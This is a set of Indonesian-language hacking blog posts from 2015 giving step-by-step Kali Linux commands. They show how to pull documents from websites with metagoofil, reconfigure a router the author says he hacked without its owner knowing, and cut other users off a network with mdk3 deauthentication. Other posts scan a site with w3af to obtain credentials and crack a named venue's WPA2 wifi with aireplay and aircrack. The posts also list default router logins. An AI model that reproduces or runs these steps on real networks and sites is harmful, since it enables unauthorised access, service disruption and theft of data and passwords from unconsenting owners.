Kamis, 30 Juli 2015

MENCURI DOKUMEN DI DALAM WEBSITE MENGGUNAKAN METAGOOFIL DI KALI LINUX

ASSALAMUALLAIKUM WR WB


Kali ini gw memposting bagaimana cara nyolong data berupa dokumen pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx yang ada di dalam website menggunakan metagoofil di kali linux
tentu saja metagoofil ini sudah ada di dalam kali linux

jika anda yang suka dengan mencari ebook ataupun tugas kuliah berupa dokument yang di suruh berbayar
pasti anda sakit hati kan

nah untuk obat sakit hati ini nih tools yang tepat buat para pencari ebook apalagi ebook pentest security


oke langsung aja

buka terminal anda dan masukan perintah

metagoofil -h



ket : -h adalah untuk melihat option yang akan digunakan

metagoofil.py -d www.target.com -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 200 -n 50 -o hasil -f hasil.html

Contoh :

metagoofil.py -d www.8notes.com -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 200 -n 50 -o 8notes -f hasil.html



Biarkan metagoofil berjalan hingga selesai


Jika anda mencari dokumen yang anda cari ada di file HOME dan di folder yang anda masukan pada perintah sebelumnya

contoh :
folder yang gw kasih nama pada perintah sebelumnya adalah 8notes




Jadi ini file hasil colongan :v




Jika masih kurang jelas bisa liat video gw



SEKIAN DARI GW
JANGAN DISALAH GUNAKAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA

HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

Minggu, 05 Juli 2015

CARA MENGAMANKAN BACKDOOR ROUTER MENGGUNAKAN TELNET DI KALI LINUX

ASSALLAMUALAIKUM WR WB





Kali ini gw mau memposting bagaimana cara mengamankan modem router
tentu saja jika sewaktu-waktu router anda di retas oleh orang tidak bertanggung jawab , password & nama wifi anda bisa saja dirubah oleh sang hacker

nah dipostingan kali ini gw mau memperlihatkan bagaimana cara mengamankannya dengan telnet yang sudah ada di distro pentest yaitu kali linux atau backtrack

oke langsung aja gak usah banyak cingcong :v


masuk ke settingan router

masukan ip gateway di link address

biasanya 192.168.1.1 atau 192.168.1.254

masukan username & password

username : admin
password : admin

atau

username : support
password : theworldinyourhand

rubah terlebih dahulu password default menjadi password yang anda inginkan dan JANGAN SAMPAI LUPA !!!

Ini router hasil hack , jadi mumpung gak di tau empunya jadinya gw jadiin pembelajaran buat anda !!!


buka terminal anda

dan masukan perintah

telnet ip.gateway

contoh :

telnet 192.168.1.254

ket : 192.168.1.254 adalah ip gateway korban gw saat ini



dan masukan password router anda


masukan perintah

ls
atau
sys


sys multiuser off



sys multiuser2remote 0



sys multiuser3remote 0


Ket :

0 = mati
1 = hidup

ganti username dengan yang anda inginkan dan JANGAN SAMPAI LUPA !!!
sys adminname namauseranda

contoh :
sys adminname REXTOR

ket : REXTOR adalah nama user router yang akan gw gunakan


sys reboot



jadi setelah anda login dan ingin masuk ke settingan router

username yang awalnya admin atau support akan berubah dengan username yang anda masukan sebelumnya
masuk ke settingan router
192.168.1.1 atau 192.168.1.254

isikan
username : username anda
password : password anda

 Contoh :

username : REXTOR
password : 12345678

jadi seperti ini


jadi username yang awalnya default akan berubah menjadi username yang anda masukan sebelumnya

contoh :

Sebelum diganti


sesudah diganti

LEBIH BAIK USERNAME & PASSWORD ANDA SIMPAN WORDPAD AGAR TIDAK MENYESAL DI KEMUDIAN HARI !!!

Jika masih kurang jelas bisa lihat video gw



Oke sekian dari gw semoga bermanfaat
Mohon maaf jika ada kekurangan dalam penjelasan gw

KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA

HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

Sabtu, 04 Juli 2015

MEMOTONG KONEKSI ORANG LAIN MENGGUNAKAN MDK3 DI KALI LINUX

ASSALLAMUALAIKUM WR WB


Hallo para blogger
yah gak terasa lagi bentar mau lebaran yak :v
di postingan kali ini gw mau memperlihatkan bagaimana cara memotong koneksi client di 1 jaringan dengan kita
tentu saja jika kita sedang berinternetan dalam keadaan koneksi yang lemah bikin sakit hati kan
nah ini nih obatnya sakit hati para linuxer :v


oke langsung aja deh
keep calm aja vroh

buka terminal anda dan nyalakan interface mon0

airmon-ng start wlan0


ifconfig wlan0

copy macc address anda




lanjutkan dengan perintah

echo macc:anda >> w.txt

ket : w.txt adalah whitelist dan di dalam whitelist itu adalah macc address anda

contoh :

echo 14:cc:20:13:0a:10 >> w.txt



Jalankan dengan perintah

mdk3 mon0 d -w w.txt



Jika anda ingin memotong hanya satu client saja
masukan perintah

echo macc:korban >> b.txt

ket : b.txt adalah blacklist

contoh :

echo 24:EC:99:2E:04:0A >> b.txt

dan jalankan dengan perintah

mdk3 mon0 d -b b.txt



Oke sekian dari gw
Mohon maaf jika ada kekurangan dalam penjelasan gw

KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA

HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

Jumat, 03 Juli 2015

MENCARI KELEMAHAN WEBSITE MENGGUNAKAN W3AF DI KALI LINUX

ASSALAMUALLAIKUM WR WB


Kali ini gw mau memperlihatkan bagaimana mencari celah suatu website menggunakan  tool w3af yang tentunya sudah tersedia di kali linux
Dengan w3af anda bisa melihat kerentanan website target bisa berupa sql , xss , web backdoor , file upload dll


oke langsung saja

Buka W3af
Application > Kali Linux > Web Applications > Web Vulnerability Scanners > w3af


atau dengan cara

buka terminal dan masukan perintah
w3af "enter"




Beri tanda centang pada option yang ingin anda gunakan 
Masukan Url website target dan lanjutkan dengan cara klik start



Biarkan scaning berjalan
dan disini gw menemukan kerentanan di dalam web tersebut



Note : font yang berwarna merah adalah kerentanan web tersebut


Di tahap ini gw mulai membuka system kerentanan mereka
dan disini gw mendapatkan username , password & email tanpa harus capek menggunakan sqlmap untuk dumping isi database website


Oke sekian dari gw

Jika kurang jelas bisa lihat video gw disini






JANGAN DISALAH GUNAKAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA

HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

CARA HACK WIFI WPA2/PSK MENGGUNAKAN WIFI-HONEY , AIREPLAY & AIRCRACK DI KALI LINUX

ASSALLAMUALLAIKUM WR WB

Selamat pagi para blogger
kali ini gw mau memposting cara hack wifi wpa2/psk menggunakan wifi-honey yang jelas tools ini sudah tersedia di kali linux

oke langsung saja

Nyalakan interface mon0 anda dengan perintah
airmon-ng start wlan0
jika anda tidak mengetahui interface yang anda gunakan anda bisa menggunakan perintah
airmon-ng

contoh : wlan0 adalah interface yang gw gunakan


setelah itu cari target anda
masukan perintah : airodump-ng mon0


biarkan scaning hingga anda menemukan target
jika sudah mendapatkan target tekan CTRL + C untuk menghentikan proses scaning


buka wifi-honey
application > kali linux > wireless attack > 802.11 wireless tools > wifi-honey



atau dengan cara manual
buka terminal anda dan ketikan

wifi-honey -h setelah itu tekan "enter"
ket : -h artinya help dan itu untuk melihat perintah yang akan anda gunakan


masukan Ssid , Chanel dan interface yang anda gunakan
dengan perintah

wifi-honey namawifi 2 wlan0

contoh : wifi-honey POONAR 1 wlan0
ket : POONAR => nama wifi target
        1               => chanel wifi target
        wlan0        => interface yang gw


Selanjutnya biarkan wifi-honey berjalan

buka terminal baru dan masukan perintah berikut

aireplay-ng --deauth 10 -a BSSID:WIFI:TARGET:ANDA mon0 --ignore-negative-one

Contoh :
aireplay-ng --deauth 10 -a 30:B5:C2:F8:A2:78 mon0 --ignore-negative-one

Dan biarkan deauth berjalan hingga selesai

ket :
30:B5:C2:F8:A2:78 adalah BSSID wifi POONAR FUTSAL yang gw jadikan target


Ditahap ini Jalankan Aircrack untuk mencari password wifi tersebut

aircrack-ng -w /lokasiwordlistanda/wordlist.txt /lokasihasilcapture/capture.cap

contoh :
aircrack-ng -w /root/Rextor.txt /root/cap-01.cap

ket :
root adalah file home
Rextor.txt adalah nama wordlist gw
cap-01.cap adalah nama hasil capture dari wifi-honey



pilih yang mendapatkan handshake
di dalam kasus saya mendapatkan handshake POONAR FUTSAL di nomor 5

note : Jika belum mendapatkan handshake maka ada tanda 0 di setiap keterangan aircrack
         Dan sudah mendapatkan handshake ada tanda 1 di setiap keterangan aircrack
         tekan angka dimana letak handshake anda dan "enter"



Tunggu hingga mendapatkan password
tutup wifi-honey dengan cara CTRL + C

Password ditemukan apabila keterangan "KEY FOUND"

dan dalam kasus gw
password yang gw dapatkan 12345678



Dan silahkan di coba untuk konek ke wifi yang anda targetkan sebelumnya :D



Jika belum jelas bisa tonton video gw
sebelumnya mohon maaf karena di dalam video ada kekurangan dalam sebuah perintah aireplay
karena gw lupa masukin waktu itu :v



Oke sekian dari gw

Gw mohon maaf jika ada pemilik wifi yg mampir kesini & liat wifinya kena hack


JANGAN DISALAH GUNAKAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA

HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

 
;);